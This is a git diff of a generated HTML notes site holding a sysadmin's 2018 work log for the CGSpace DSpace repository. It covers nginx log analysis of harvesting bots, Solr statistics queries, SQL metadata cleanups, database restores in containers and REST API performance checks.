    # zcat --force /var/log/nginx/rest.log /var/log/nginx/rest.log.1 | grep -E "13/Sep/2018" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10                                                                                                
          32 46.229.161.131
          38 104.198.9.108
          39 66.249.64.91
    @@ -333,9 +333,9 @@ $ sudo docker run --name dspacedb -v dspacetest_data:/var/lib/postgresql/data -e
     
    • And the top two addresses seem to be re-using their Tomcat sessions properly:
    -
    $ grep -c -E 'session_id=[A-Z0-9]{32}:ip_addr=70.32.83.92' dspace.log.2018-09-13 | sort | uniq
    +
    $ grep -c -E 'session_id=[A-Z0-9]{32}:ip_addr=70.32.83.92' dspace.log.2018-09-13 | sort | uniq
     7
    -$ grep -c -E 'session_id=[A-Z0-9]{32}:ip_addr=50.116.102.77' dspace.log.2018-09-13 | sort | uniq
    +$ grep -c -E 'session_id=[A-Z0-9]{32}:ip_addr=50.116.102.77' dspace.log.2018-09-13 | sort | uniq
     2
     
    • So I’m not sure what’s going on
    • @@ -397,12 +397,12 @@ $ grep -c -E 'session_id=[A-Z0-9]{32}:ip_addr=50.116.102.77' dspace.log.2018-09-
    • There are some example queries on the DSpace Solr wiki
    • For example, this query returns 1655 rows for item 10568/10630:
    -
    $ http 'http://localhost:3000/solr/statistics/select?indent=on&rows=0&q=type:0+owningItem:11576&fq=isBot:false'
    +
    $ http 'http://localhost:3000/solr/statistics/select?indent=on&rows=0&q=type:0+owningItem:11576&fq=isBot:false'
     
    • The id in the Solr query is the item’s database id (get it from the REST API or something)
    • Next, I adopted a query to get the downloads and it shows 889, which is similar to the number Atmire’s statlet shows, though the query logic here is confusing:
    -
    $ http 'http://localhost:3000/solr/statistics/select?indent=on&rows=0&q=type:0+owningItem:11576&fq=isBot:false&fq=-(bundleName:[*+TO+*]-bundleName:ORIGINAL)&fq=-(statistics_type:[*+TO+*]+-statistics_type:view)'
    +
    $ http 'http://localhost:3000/solr/statistics/select?indent=on&rows=0&q=type:0+owningItem:11576&fq=isBot:false&fq=-(bundleName:[*+TO+*]-bundleName:ORIGINAL)&fq=-(statistics_type:[*+TO+*]+-statistics_type:view)'
     
    • According to the SolrQuerySyntax page on the Apache wiki, the [* TO *] syntax just selects a range (in this case all values for a field)
    • So it seems to be: @@ -413,15 +413,15 @@ $ grep -c -E 'session_id=[A-Z0-9]{32}:ip_addr=50.116.102.77' dspace.log.2018-09-
    • What the shit, I think I’m right: the simplified logic in this query returns the same 889:
    -
    $ http 'http://localhost:3000/solr/statistics/select?indent=on&rows=0&q=type:0+owningItem:11576&fq=isBot:false&fq=bundleName:ORIGINAL&fq=-(statistics_type:[*+TO+*]+-statistics_type:view)'
    +
    $ http 'http://localhost:3000/solr/statistics/select?indent=on&rows=0&q=type:0+owningItem:11576&fq=isBot:false&fq=bundleName:ORIGINAL&fq=-(statistics_type:[*+TO+*]+-statistics_type:view)'
     
    • And if I simplify the statistics_type logic the same way, it still returns the same 889!
    -
    $ http 'http://localhost:3000/solr/statistics/select?indent=on&rows=0&q=type:0+owningItem:11576&fq=isBot:false&fq=bundleName:ORIGINAL&fq=statistics_type:view'
    +
    $ http 'http://localhost:3000/solr/statistics/select?indent=on&rows=0&q=type:0+owningItem:11576&fq=isBot:false&fq=bundleName:ORIGINAL&fq=statistics_type:view'
     
    • As for item views, I suppose that’s just the same query, minus the bundleName:ORIGINAL:
    -
    $ http 'http://localhost:3000/solr/statistics/select?indent=on&rows=0&q=type:0+owningItem:11576&fq=isBot:false&fq=-bundleName:ORIGINAL&fq=statistics_type:view'
    +
    $ http 'http://localhost:3000/solr/statistics/select?indent=on&rows=0&q=type:0+owningItem:11576&fq=isBot:false&fq=-bundleName:ORIGINAL&fq=statistics_type:view'
     
    • That one returns 766, which is exactly 1655 minus 889…
    • Also, Solr’s fq is similar to the regular q query parameter, but it is considered for the Solr query cache so it should be faster for multiple queries
    • @@ -432,11 +432,11 @@ $ grep -c -E 'session_id=[A-Z0-9]{32}:ip_addr=50.116.102.77' dspace.log.2018-09-
    • It uses the Python-based Falcon web framework and talks to Solr directly using the SolrClient library (which seems to have issues in Python 3.7 currently)
    • After deploying on DSpace Test I can then get the stats for an item using its ID:
    -
    $ http -b 'https://dspacetest.cgiar.org/rest/statistics/item?id=110988'
    +
    $ http -b 'https://dspacetest.cgiar.org/rest/statistics/item?id=110988'
     {
    -    "downloads": 2,
    -    "id": 110988,
    -    "views": 15
    +    "downloads": 2,
    +    "id": 110988,
    +    "views": 15
     }
     
    • The numbers are different than those that come from Atmire’s statlets for some reason, but as I’m querying Solr directly, I have no idea where their numbers come from!
    • @@ -533,7 +533,7 @@ sqlite> INSERT INTO items(id, views) VALUES(0, 7) ON CONFLICT(id) DO UPDATE S
      # python3
       Python 3.5.2 (default, Nov 23 2017, 16:37:01) 
       [GCC 5.4.0 20160609] on linux
      -Type "help", "copyright", "credits" or "license" for more information.
      +Type "help", "copyright", "credits" or "license" for more information.
       >>> import sqlite3
       >>> print(sqlite3.sqlite_version)
       3.24.0
      @@ -606,7 +606,7 @@ Indexing item downloads (page 260 of 260)
       
    • I will have to keep an eye on that over the next few weeks to see if things stay as they are
    • I did a batch replacement of the access rights with my fix-metadata-values.py script on DSpace Test:
    -
    $ ./fix-metadata-values.py -i /tmp/fix-access-status.csv -db dspace -u dspace -p 'fuuu' -f cg.identifier.status -t correct -m 206
    +
    $ ./fix-metadata-values.py -i /tmp/fix-access-status.csv -db dspace -u dspace -p 'fuuu' -f cg.identifier.status -t correct -m 206
     
    • This changes “Open Access” to “Unrestricted Access” and “Limited Access” to “Restricted Access”
    • After that I did a full Discovery reindex:
    • @@ -629,7 +629,7 @@ sys 2m18.485s
    • Linode emailed to say that CGSpace’s (linode19) CPU load was high for a few hours last night
    • Looking in the nginx logs around that time I see some new IPs that look like they are harvesting things:
    -
    # zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E "26/Sep/2018:(19|20|21)" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
    +
    # zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E "26/Sep/2018:(19|20|21)" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
         295 34.218.226.147
         296 66.249.64.95
         350 157.55.39.185
    @@ -645,9 +645,9 @@ sys     2m18.485s
     
  • 68.6.87.12 is on Cox Communications in the US (?)
  • These hosts are not using proper user agents and are not re-using their Tomcat sessions:
  • -
    $ grep -c -E 'session_id=[A-Z0-9]{32}:ip_addr=35.237.175.180' dspace.log.2018-09-26 | sort | uniq
    +
    $ grep -c -E 'session_id=[A-Z0-9]{32}:ip_addr=35.237.175.180' dspace.log.2018-09-26 | sort | uniq
     5423
    -$ grep -c -E 'session_id=[A-Z0-9]{32}:ip_addr=68.6.87.12' dspace.log.2018-09-26 | sort | uniq
    +$ grep -c -E 'session_id=[A-Z0-9]{32}:ip_addr=68.6.87.12' dspace.log.2018-09-26 | sort | uniq
     758
     
    • I will add their IPs to the list of bad bots in nginx so we can add a “bot” user agent to them and let Tomcat’s Crawler Session Manager Valve handle them
    • @@ -659,8 +659,8 @@ $ grep -c -E 'session_id=[A-Z0-9]{32}:ip_addr=68.6.87.12' dspace.log.2018-09-26
    • Peter sent me a list of 43 author names to fix, but it had some encoding errors like Belalcázar, John like usual (I will tell him to stop trying to export as UTF-8 because it never seems to work)
    • I did batch replaces for both on CGSpace with my fix-metadata-values.py script:
    -
    $ ./fix-metadata-values.py -i 2018-09-29-fix-affiliations.csv -db dspace -u dspace -p 'fuuu' -f cg.contributor.affiliation -t correct -m 211
    -$ ./fix-metadata-values.py -i 2018-09-29-fix-authors.csv -db dspace -u dspace -p 'fuuu' -f dc.contributor.author -t correct -m 3
    +
    $ ./fix-metadata-values.py -i 2018-09-29-fix-affiliations.csv -db dspace -u dspace -p 'fuuu' -f cg.contributor.affiliation -t correct -m 211
    +$ ./fix-metadata-values.py -i 2018-09-29-fix-authors.csv -db dspace -u dspace -p 'fuuu' -f dc.contributor.author -t correct -m 3
     
    • Afterwards I started a full Discovery re-index:
    @@ -675,18 +675,18 @@ $ ./fix-metadata-values.py -i 2018-09-29-fix-authors.csv -db dspace -u dspace -p
  • Valerio keeps sending items on CGSpace that have weird or incorrect languages, authors, etc
  • I think I should just batch export and update all languages…
  • -
    dspace=# \copy (select distinct text_value, count(*) from metadatavalue where metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = 'language' and qualifier = 'iso') AND resource_type_id = 2 group by text_value order by count desc) to /tmp/2018-09-30-languages.csv with csv;
    +
    dspace=# \copy (select distinct text_value, count(*) from metadatavalue where metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = 'language' and qualifier = 'iso') AND resource_type_id = 2 group by text_value order by count desc) to /tmp/2018-09-30-languages.csv with csv;
     
    • Then I can simply delete the “Other” and “other” ones because that’s not useful at all:
    -
    dspace=# DELETE FROM metadatavalue WHERE resource_type_id=2 AND metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = 'language' and qualifier = 'iso') AND text_value='Other';
    +
    dspace=# DELETE FROM metadatavalue WHERE resource_type_id=2 AND metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = 'language' and qualifier = 'iso') AND text_value='Other';
     DELETE 6
    -dspace=# DELETE FROM metadatavalue WHERE resource_type_id=2 AND metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = 'language' and qualifier = 'iso') AND text_value='other';
    +dspace=# DELETE FROM metadatavalue WHERE resource_type_id=2 AND metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = 'language' and qualifier = 'iso') AND text_value='other';
     DELETE 79
     
    • Looking through the list I see some weird language codes like gh, so I checked out those items:
    -
    dspace=# SELECT resource_id FROM metadatavalue WHERE resource_type_id=2 AND metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = 'language' and qualifier = 'iso') AND text_value='gh';
    +
    dspace=# SELECT resource_id FROM metadatavalue WHERE resource_type_id=2 AND metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = 'language' and qualifier = 'iso') AND text_value='gh';
      resource_id
     -------------
            94530
    @@ -699,12 +699,12 @@ dspace=# SELECT handle,item_id FROM item, handle WHERE handle.resource_type_id=2
     
    • Those items are from Ghana, so the submitter apparently thought gh was a language… I can safely delete them:
    -
    dspace=# DELETE FROM metadatavalue WHERE resource_type_id=2 AND metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = 'language' and qualifier = 'iso') AND text_value='gh';
    +
    dspace=# DELETE FROM metadatavalue WHERE resource_type_id=2 AND metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = 'language' and qualifier = 'iso') AND text_value='gh';
     DELETE 2
     
    • The next issue would be jn:
    -
    dspace=# SELECT resource_id FROM metadatavalue WHERE resource_type_id=2 AND metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = 'language' and qualifier = 'iso') AND text_value='jn';
    +
    dspace=# SELECT resource_id FROM metadatavalue WHERE resource_type_id=2 AND metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = 'language' and qualifier = 'iso') AND text_value='jn';
      resource_id
     -------------
            94001
    @@ -718,12 +718,12 @@ dspace=# SELECT handle,item_id FROM item, handle WHERE handle.resource_type_id=2
     
  • Those items are about Japan, so I will update them to be ja
  • Other replacements:
  • -
    DELETE FROM metadatavalue WHERE resource_type_id=2 AND metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = 'language' and qualifier = 'iso') AND text_value='gh';
    -UPDATE metadatavalue SET text_value='fr' WHERE resource_type_id=2 AND metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = 'language' and qualifier = 'iso') AND text_value='fn';
    -UPDATE metadatavalue SET text_value='hi' WHERE resource_type_id=2 AND metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = 'language' and qualifier = 'iso') AND text_value='in';
    -UPDATE metadatavalue SET text_value='ja' WHERE resource_type_id=2 AND metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = 'language' and qualifier = 'iso') AND text_value='Ja';
    -UPDATE metadatavalue SET text_value='ja' WHERE resource_type_id=2 AND metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = 'language' and qualifier = 'iso') AND text_value='jn';
    -UPDATE metadatavalue SET text_value='ja' WHERE resource_type_id=2 AND metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = 'language' and qualifier = 'iso') AND text_value='jp';
    +
    DELETE FROM metadatavalue WHERE resource_type_id=2 AND metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = 'language' and qualifier = 'iso') AND text_value='gh';
    +UPDATE metadatavalue SET text_value='fr' WHERE resource_type_id=2 AND metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = 'language' and qualifier = 'iso') AND text_value='fn';
    +UPDATE metadatavalue SET text_value='hi' WHERE resource_type_id=2 AND metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = 'language' and qualifier = 'iso') AND text_value='in';
    +UPDATE metadatavalue SET text_value='ja' WHERE resource_type_id=2 AND metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = 'language' and qualifier = 'iso') AND text_value='Ja';
    +UPDATE metadatavalue SET text_value='ja' WHERE resource_type_id=2 AND metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = 'language' and qualifier = 'iso') AND text_value='jn';
    +UPDATE metadatavalue SET text_value='ja' WHERE resource_type_id=2 AND metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = 'language' and qualifier = 'iso') AND text_value='jp';
     
    • Then there are 12 items with en|hi, but they were all in one collection so I just exported it as a CSV and then re-imported the corrected metadata
    diff --git a/docs/2018-10/index.html b/docs/2018-10/index.html index d9a54f307..86515baf7 100644 --- a/docs/2018-10/index.html +++ b/docs/2018-10/index.html @@ -26,7 +26,7 @@ I created a GitHub issue to track this #389, because I’m super busy in Nai Phil Thornton got an ORCID identifier so we need to add it to the list on CGSpace and tag his existing items I created a GitHub issue to track this #389, because I’m super busy in Nairobi right now "/> - + @@ -121,7 +121,7 @@ I created a GitHub issue to track this #389, because I’m super busy in Nai
    • I see Moayad was busy collecting item views and downloads from CGSpace yesterday:
    -
    # zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E "02/Oct/2018" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
    +
    # zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E "02/Oct/2018" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
         933 40.77.167.90
         971 95.108.181.88
        1043 41.204.190.40
    @@ -135,13 +135,13 @@ I created a GitHub issue to track this #389, because I’m super busy in Nai
     
    • Of those, about 20% were HTTP 500 responses (!):
    -
    $ zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E "02/Oct/2018" | grep 34.218.226.147 | awk '{print $9}' | sort -n | uniq -c
    +
    $ zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E "02/Oct/2018" | grep 34.218.226.147 | awk '{print $9}' | sort -n | uniq -c
      118927 200
       31435 500
     
    • I added Phil Thornton and Sonal Henson’s ORCID identifiers to the controlled vocabulary for cg.creator.orcid and then re-generated the names using my resolve-orcids.py script:
    -
    $ grep -oE '[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}' ~/src/git/DSpace/dspace/config/controlled-vocabularies/cg-creator-id.xml | sort | uniq > 2018-10-03-orcids.txt
    +
    $ grep -oE '[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}' ~/src/git/DSpace/dspace/config/controlled-vocabularies/cg-creator-id.xml | sort | uniq > 2018-10-03-orcids.txt
     $ ./resolve-orcids.py -i 2018-10-03-orcids.txt -o 2018-10-03-names.txt -d
     
    • I found a new corner case error that I need to check, given and family names deactivated:
    • @@ -154,7 +154,7 @@ Given Names Deactivated Family Name Deactivated: 0000-0001-7930-5752
    • Linode sent another alert about CPU usage on CGSpace (linode18) this evening
    • It seems that Moayad is making quite a lot of requests today:
    -
    # zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E "03/Oct/2018" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
    +
    # zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E "03/Oct/2018" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
        1594 157.55.39.160
        1627 157.55.39.173
        1774 136.243.6.84
    @@ -169,13 +169,13 @@ Given Names Deactivated Family Name Deactivated: 0000-0001-7930-5752
     
  • But in super positive news, he says they are using my new dspace-statistics-api and it’s MUCH faster than using Atmire CUA’s internal “restlet” API
  • I don’t recognize the 138.201.49.199 IP, but it is in Germany (Hetzner) and appears to be paginating over some browse pages and downloading bitstreams:
  • -
    # grep 138.201.49.199 /var/log/nginx/access.log | grep -o -E 'GET /[a-z]+' | sort | uniq -c
    +
    # grep 138.201.49.199 /var/log/nginx/access.log | grep -o -E 'GET /[a-z]+' | sort | uniq -c
        8324 GET /bitstream
        4193 GET /handle
     
    • Suspiciously, it’s only grabbing the CGIAR System Office community (handle prefix 10947):
    -
    # grep 138.201.49.199 /var/log/nginx/access.log | grep -o -E 'GET /handle/[0-9]{5}' | sort | uniq -c
    +
    # grep 138.201.49.199 /var/log/nginx/access.log | grep -o -E 'GET /handle/[0-9]{5}' | sort | uniq -c
           7 GET /handle/10568
        4186 GET /handle/10947
     
      @@ -187,19 +187,19 @@ Given Names Deactivated Family Name Deactivated: 0000-0001-7930-5752
    • I looked in Solr’s statistics core and these hits were actually all counted as isBot:false (of course)… hmmm
    • I tagged all of Sonal and Phil’s items with their ORCID identifiers on CGSpace using my add-orcid-identifiers.py script:
    -
    $ ./add-orcid-identifiers-csv.py -i 2018-10-03-add-orcids.csv -db dspace -u dspace -p 'fuuu'
    +
    $ ./add-orcid-identifiers-csv.py -i 2018-10-03-add-orcids.csv -db dspace -u dspace -p 'fuuu'
     
    • Where 2018-10-03-add-orcids.csv contained:
    dc.contributor.author,cg.creator.id
    -"Henson, Sonal P.",Sonal Henson: 0000-0002-2002-5462
    -"Henson, S.",Sonal Henson: 0000-0002-2002-5462
    -"Thornton, P.K.",Philip Thornton: 0000-0002-1854-0182
    -"Thornton, Philip K",Philip Thornton: 0000-0002-1854-0182
    -"Thornton, Phil",Philip Thornton: 0000-0002-1854-0182
    -"Thornton, Philip K.",Philip Thornton: 0000-0002-1854-0182
    -"Thornton, Phillip",Philip Thornton: 0000-0002-1854-0182
    -"Thornton, Phillip K.",Philip Thornton: 0000-0002-1854-0182
    +"Henson, Sonal P.",Sonal Henson: 0000-0002-2002-5462
    +"Henson, S.",Sonal Henson: 0000-0002-2002-5462
    +"Thornton, P.K.",Philip Thornton: 0000-0002-1854-0182
    +"Thornton, Philip K",Philip Thornton: 0000-0002-1854-0182
    +"Thornton, Phil",Philip Thornton: 0000-0002-1854-0182
    +"Thornton, Philip K.",Philip Thornton: 0000-0002-1854-0182
    +"Thornton, Phillip",Philip Thornton: 0000-0002-1854-0182
    +"Thornton, Phillip K.",Philip Thornton: 0000-0002-1854-0182
     

    2018-10-04

    • Salem raised an issue that the dspace-statistics-api reports downloads for some items that have no bitstreams (like many limited access items)
    • @@ -214,7 +214,7 @@ Given Names Deactivated Family Name Deactivated: 0000-0001-7930-5752
    • So it’s fixed, but I’m not sure why!
    • Peter wants to know the number of API requests per month, which was about 250,000 in September (exluding statlet requests):
    -
    # zcat --force /var/log/nginx/{oai,rest}.log* | grep -E 'Sep/2018' | grep -c -v 'statlets'
    +
    # zcat --force /var/log/nginx/{oai,rest}.log* | grep -E 'Sep/2018' | grep -c -v 'statlets'
     251226
     
    • I found a logic error in the dspace-statistics-api indexer.py script that was causing item views to be inserted into downloads
    • @@ -243,7 +243,7 @@ Given Names Deactivated Family Name Deactivated: 0000-0001-7930-5752
    • When I tried to force them to be generated I got an error that I’ve never seen before:
    $ dspace filter-media -v -f -i 10568/97613
    -org.im4java.core.InfoException: org.im4java.core.CommandException: org.im4java.core.CommandException: identify: not authorized `/tmp/impdfthumb5039464037201498062.pdf' @ error/constitute.c/ReadImage/412.
    +org.im4java.core.InfoException: org.im4java.core.CommandException: org.im4java.core.CommandException: identify: not authorized `/tmp/impdfthumb5039464037201498062.pdf' @ error/constitute.c/ReadImage/412.
     
    • I see there was an update to Ubuntu’s ImageMagick on 2018-10-05, so maybe something changed or broke?
    • I get the same error when forcing filter-media to run on DSpace Test too, so it’s gotta be an ImageMagic bug
    • @@ -251,7 +251,7 @@ org.im4java.core.InfoException: org.im4java.core.CommandException: org.im4java.c
    • Wow, someone on Twitter posted about this breaking his web application (and it was retweeted by the ImageMagick acount!)
    • I commented out the line that disables PDF thumbnails in /etc/ImageMagick-6/policy.xml:
    -
      <!--<policy domain="coder" rights="none" pattern="PDF" />-->
    +
      <!--<policy domain="coder" rights="none" pattern="PDF" />-->
     
    • This works, but I’m not sure what ImageMagick’s long-term plan is if they are going to disable ALL image formats…
    • I suppose I need to enable a workaround for this in Ansible?
    • @@ -274,9 +274,9 @@ $ sudo podman create --name dspacedb -v /home/aorth/.local/lib/containers/volume $ sudo podman start dspacedb $ createuser -h localhost -U postgres --pwprompt dspacetest $ createdb -h localhost -U postgres -O dspacetest --encoding=UNICODE dspacetest -$ psql -h localhost -U postgres dspacetest -c 'alter user dspacetest superuser;' +$ psql -h localhost -U postgres dspacetest -c 'alter user dspacetest superuser;' $ pg_restore -h localhost -U postgres -d dspacetest -O --role=dspacetest -h localhost ~/Downloads/cgspace_2018-10-11.backup -$ psql -h localhost -U postgres dspacetest -c 'alter user dspacetest nosuperuser;' +$ psql -h localhost -U postgres dspacetest -c 'alter user dspacetest nosuperuser;' $ psql -h localhost -U postgres -f ~/src/git/DSpace/dspace/etc/postgres/update-sequences.sql dspacetest
    • I tried to make an Artifactory in podman, but it seems to have problems because Artifactory is distributed on the Bintray repository
    • @@ -311,7 +311,7 @@ COPY 10000
    • Then I exported and applied them on my local test server:
    -
    $ ./fix-metadata-values.py -i 2018-10-11-top-authors.csv -db dspace -u dspace -p 'fuuu' -f dc.contributor.author -t CORRECT -m 3
    +
    $ ./fix-metadata-values.py -i 2018-10-11-top-authors.csv -db dspace -u dspace -p 'fuuu' -f dc.contributor.author -t CORRECT -m 3
     
    • I will apply these on CGSpace when I do the other updates tomorrow, as well as double check the high scoring ones to see if they are correct in Sisay’s author controlled vocabulary
    @@ -321,7 +321,7 @@ COPY 10000
  • Switch to new CGIAR LDAP server on CGSpace, as it’s been running (at least for authentication) on DSpace Test for the last few weeks, and I think they old one will be deprecated soon (today?)
  • Apply Peter’s 746 author corrections on CGSpace and DSpace Test using my fix-metadata-values.py script:
  • -
    $ ./fix-metadata-values.py -i /tmp/2018-10-11-top-authors.csv -f dc.contributor.author -t CORRECT -m 3 -db dspace -u dspace -p 'fuuu'
    +
    $ ./fix-metadata-values.py -i /tmp/2018-10-11-top-authors.csv -f dc.contributor.author -t CORRECT -m 3 -db dspace -u dspace -p 'fuuu'
     
    • Run all system updates on CGSpace (linode19) and reboot the server
    • After rebooting the server I noticed that Handles are not resolving, and the dspace-handle-server systemd service is not running (or rather, it exited with success)
    • @@ -356,20 +356,20 @@ COPY 10000 $ sudo docker run --name dspacedb -v /home/aorth/.local/lib/containers/volumes/dspacedb_data:/var/lib/postgresql/data -e POSTGRES_PASSWORD=postgres -p 5432:5432 -d postgres:9.6-alpine $ createuser -h localhost -U postgres --pwprompt dspacetest $ createdb -h localhost -U postgres -O dspacetest --encoding=UNICODE dspacetest -$ psql -h localhost -U postgres dspacetest -c 'alter user dspacetest superuser;' +$ psql -h localhost -U postgres dspacetest -c 'alter user dspacetest superuser;' $ pg_restore -h localhost -U postgres -d dspacetest -O --role=dspacetest -h localhost ~/Downloads/cgspace_2018-10-11.backup $ psql -h localhost -U postgres -f ~/src/git/DSpace/dspace/etc/postgres/update-sequences.sql dspacetest -$ psql -h localhost -U postgres dspacetest -c 'alter user dspacetest nosuperuser;' +$ psql -h localhost -U postgres dspacetest -c 'alter user dspacetest nosuperuser;'

    2018-10-16

    • Generate a list of the schema on CGSpace so CodeObia can compare with MELSpace:
    -
    dspace=# \copy (SELECT (CASE when metadata_schema_id=1 THEN 'dc' WHEN metadata_schema_id=2 THEN 'cg' END) AS schema, element, qualifier, scope_note FROM metadatafieldregistry where metadata_schema_id IN (1,2)) TO /tmp/cgspace-schema.csv WITH CSV HEADER;
    +
    dspace=# \copy (SELECT (CASE when metadata_schema_id=1 THEN 'dc' WHEN metadata_schema_id=2 THEN 'cg' END) AS schema, element, qualifier, scope_note FROM metadatafieldregistry where metadata_schema_id IN (1,2)) TO /tmp/cgspace-schema.csv WITH CSV HEADER;
     
    • Talking to the CodeObia guys about the REST API I started to wonder why it’s so slow and how I can quantify it in order to ask the dspace-tech mailing list for help profiling it
    • Interestingly, the speed doesn’t get better after you request the same thing multiple times–it’s consistently bad on both CGSpace and DSpace Test!
    -
    $ time http --print h 'https://cgspace.cgiar.org/rest/items?expand=metadata,bitstreams,parentCommunityList&limit=100&offset=0'
    +
    $ time http --print h 'https://cgspace.cgiar.org/rest/items?expand=metadata,bitstreams,parentCommunityList&limit=100&offset=0'
     ...
     0.35s user 0.06s system 1% cpu 25.133 total
     0.31s user 0.04s system 1% cpu 25.223 total
    @@ -377,7 +377,7 @@ $ psql -h localhost -U postgres dspacetest -c 'alter user dspacetest nosuperuser
     0.20s user 0.05s system 1% cpu 23.838 total
     0.30s user 0.05s system 1% cpu 24.301 total
     
    -$ time http --print h 'https://dspacetest.cgiar.org/rest/items?expand=metadata,bitstreams,parentCommunityList&limit=100&offset=0'
    +$ time http --print h 'https://dspacetest.cgiar.org/rest/items?expand=metadata,bitstreams,parentCommunityList&limit=100&offset=0'
     ...
     0.22s user 0.03s system 1% cpu 17.248 total
     0.23s user 0.02s system 1% cpu 16.856 total
    @@ -389,7 +389,7 @@ $ time http --print h 'https://dspacetest.cgiar.org/rest/items?expand=metadata,b
     
  • I wonder if the Java garbage collector is important here, or if there are missing indexes in PostgreSQL?
  • I switched DSpace Test to the G1GC garbage collector and tried again and now the results are worse!
  • -
    $ time http --print h 'https://dspacetest.cgiar.org/rest/items?expand=metadata,bitstreams,parentCommunityList&limit=100&offset=0'
    +
    $ time http --print h 'https://dspacetest.cgiar.org/rest/items?expand=metadata,bitstreams,parentCommunityList&limit=100&offset=0'
     ...
     0.20s user 0.03s system 0% cpu 25.017 total
     0.23s user 0.02s system 1% cpu 23.299 total
    @@ -399,7 +399,7 @@ $ time http --print h 'https://dspacetest.cgiar.org/rest/items?expand=metadata,b
     
    • If I make a request without the expands it is ten time faster:
    -
    $ time http --print h 'https://dspacetest.cgiar.org/rest/items?limit=100&offset=0'
    +
    $ time http --print h 'https://dspacetest.cgiar.org/rest/items?limit=100&offset=0'
     ...
     0.20s user 0.03s system 7% cpu 3.098 total
     0.22s user 0.03s system 8% cpu 2.896 total
    @@ -414,29 +414,29 @@ $ time http --print h 'https://dspacetest.cgiar.org/rest/items?expand=metadata,b
     
  • Most of the are from Bioversity, and I asked Maria for permission before updating them
  • I manually went through and looked at the existing values and updated them in several batches:
  • -
    UPDATE metadatavalue SET text_value='CC-BY-4.0' WHERE resource_type_id=2 AND metadata_field_id=53 AND text_value LIKE '%CC BY %';
    -UPDATE metadatavalue SET text_value='CC-BY-NC-ND-4.0' WHERE resource_type_id=2 AND metadata_field_id=53 AND text_value LIKE '%4.0%' AND text_value LIKE '%BY-NC-ND%' AND text_value LIKE '%by-nc-nd%';
    -UPDATE metadatavalue SET text_value='CC-BY-NC-SA-4.0' WHERE resource_type_id=2 AND metadata_field_id=53 AND text_value LIKE '%4.0%' AND text_value LIKE '%BY-NC-SA%' AND text_value LIKE '%by-nc-sa%';
    -UPDATE metadatavalue SET text_value='CC-BY-3.0' WHERE resource_type_id=2 AND metadata_field_id=53 AND text_value LIKE '%3.0%' AND text_value LIKE '%/by/%';
    -UPDATE metadatavalue SET text_value='CC-BY-4.0' WHERE resource_type_id=2 AND metadata_field_id=53 AND text_value LIKE '%4.0%' AND text_value LIKE '%/by/%' AND text_value NOT LIKE '%zero%';
    -UPDATE metadatavalue SET text_value='CC-BY-NC-2.5' WHERE resource_type_id=2 AND metadata_field_id=53 AND text_value LIKE
    -'%/by-nc%' AND text_value LIKE '%2.5%';
    -UPDATE metadatavalue SET text_value='CC-BY-NC-4.0' WHERE resource_type_id=2 AND metadata_field_id=53 AND text_value LIKE '%/by-nc%' AND text_value LIKE '%4.0%';
    -UPDATE metadatavalue SET text_value='CC-BY-4.0' WHERE resource_type_id=2 AND metadata_field_id=53 AND text_value LIKE '%4.0%' AND text_value LIKE '%Attribution %' AND text_value NOT LIKE '%zero%';
    -UPDATE metadatavalue SET text_value='CC-BY-NC-SA-4.0' WHERE resource_type_id=2 AND metadata_field_id=53 AND text_value NOT LIKE '%zero%' AND text_value LIKE '%4.0%' AND text_value LIKE '%Attribution-NonCommercial-ShareAlike%';
    -UPDATE metadatavalue SET text_value='CC-BY-NC-4.0' WHERE resource_type_id=2 AND metadata_field_id=53 AND text_value LIKE '%4.0%' AND text_value NOT LIKE '%zero%' AND text_value LIKE '%Attribution-NonCommercial %';
    -UPDATE metadatavalue SET text_value='CC-BY-NC-3.0' WHERE resource_type_id=2 AND metadata_field_id=53 AND text_value LIKE '%3.0%' AND text_value NOT LIKE '%zero%' AND text_value LIKE '%Attribution-NonCommercial %';
    -UPDATE metadatavalue SET text_value='CC-BY-3.0' WHERE resource_type_id=2 AND metadata_field_id=53 AND text_value LIKE '%3.0%' AND text_value NOT LIKE '%zero%' AND text_value LIKE '%Attribution %';
    -UPDATE metadatavalue SET text_value='CC-BY-ND-4.0' WHERE resource_type_id=2 AND metadata_field_id=53 AND resource_id=78184;
